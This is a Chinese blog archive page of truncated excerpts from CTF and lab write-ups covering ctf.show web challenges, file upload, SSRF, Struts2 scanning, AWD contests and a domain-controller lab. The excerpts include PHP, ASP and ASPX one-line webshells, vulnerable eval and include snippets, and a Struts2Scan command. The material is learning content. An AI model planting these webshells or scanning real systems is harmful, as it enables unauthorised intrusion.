04 2021 档案

摘要:web151(前端限制) 这里需要上传图片木马!所以我们需要先制作一张图片木马! php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request ("pass")%> aspx的一句话是: <%@ Page Language="J 阅读全文
posted @ 2021-04-23 19:53 望权栈 阅读(37) 评论(0) 推荐(0) 编辑
摘要:BF means best friend, right? 这个先放上代码! --[ >+<]> [-<+>]+[ >++<]>[-<+>]--[ >+<]> [-<+>]+[ >+++<]>++[-<+>]+[ >++<]>[-<+>]++[ >+<]>++[-<+>]--[ >+<]> [-<+> 阅读全文
posted @ 2021-04-21 20:38 望权栈 阅读(22) 评论(0) 推荐(0) 编辑
摘要:环境搭建! 这次是有三台靶机,一个web服务器,和一个域成员,域控!域成员和域控是没有联网的,只有web服务器是连接着网络的! 因此我们使用虚拟机进行构造出这样的环境! 虚拟机统一密码:hongrisec@2019 然后将winsever和win2k3改密码为 hongrisec@2021 此时再更 阅读全文
posted @ 2021-04-21 20:24 望权栈 阅读(54) 评论(0) 推荐(0) 编辑
摘要:前言 首先要安装go语言!这个需要配置好,有点难配置!此时我们下载phuip-fpizdam这个工具! web311 这里就要用到了phuip-fpizdam这个工具了! 然后再用index.php?a的命令去执行! web312(CVE-2018-19518) PHP 的imap_open函数中的 阅读全文
posted @ 2021-04-20 18:56 望权栈 阅读(52) 评论(0) 推荐(0) 编辑
摘要:SSRF 其全称:Server—Side Request Forgery :服务器端请求伪造 是一种由攻击者构造形成的由 服务器端发起请求的一个安全漏洞。一般情况下,攻击的目是外网没有办法访问的内网。 很多WEb应用都其提供了从其他服务器上获取数据的功能,使用指定的url,web 应用可以获取图片, 阅读全文
posted @ 2021-04-19 22:20 望权栈 阅读(58) 评论(0) 推荐(0) 编辑
摘要:前言 首先要尝试着去打AWD,不要不敢打,多打几遍就会打了,记得我第一次打的时候,Xshell就链了半个小时还没好,只有被动挨打的份,没有打别人的份!但这是成为大佬的必经之路。 弱口令 这个点是必须重视,基本每场比赛都有弱口令,有的还不止一个!所以我们要想办法去避免弱口令! 必须备份 这里必须备份! 阅读全文
posted @ 2021-04-18 21:25 望权栈 阅读(36) 评论(0) 推荐(0) 编辑
摘要:payload(有效攻击负载)是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码 shellcode(可提权代码) 对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload来做一些 阅读全文
posted @ 2021-04-18 15:25 望权栈 阅读(86) 评论(0) 推荐(0) 编辑
摘要:web279~279 这里便是跑脚本的事了! python Struts2Scan.py -u http://892a1226-9adc-4c5b-a700-c1ba9ca6ee26.challenge.ctf.show:8080/login.action 然后进行利用 python Struts2 阅读全文
posted @ 2021-04-16 19:42 望权栈 阅读(31) 评论(0) 推荐(0) 编辑
摘要:web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了fl 阅读全文
posted @ 2021-04-14 22:39 望权栈 阅读(43) 评论(0) 推荐(0) 编辑
摘要:web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 要用php伪协议php://filter来构造payload!!! 首先这是一个file 阅读全文
posted @ 2021-04-11 23:18 望权栈 阅读(23) 评论(0) 推荐(0) 编辑
摘要:学学web,别一直被大佬打,打痛了 web01 直接查看源代码 web02 打开开发者工具查看源代码! 或者加上view-source:在http前 web03 于响应头可以找到flag web04 根据提示访问url+/robots.txt然后根据提示再访问flagishere.txt web05 阅读全文
posted @ 2021-04-10 17:00 望权栈 阅读(27) 评论(0) 推荐(0) 编辑
摘要:secret-string-400 后缀为gz,第一次见这种压缩包! 当然我们也可以直接就去用ida看看,是可以发现无法进行逆向的,所以我们解压它! 有点像web题型,不过它是给了代码的! 我们打开看看! 这是用火狐打开所显示的内容,用IE打开是没有办法完整显示的,此时我们再来看看另一个html页面 阅读全文
posted @ 2021-04-05 12:29 望权栈 阅读(51) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示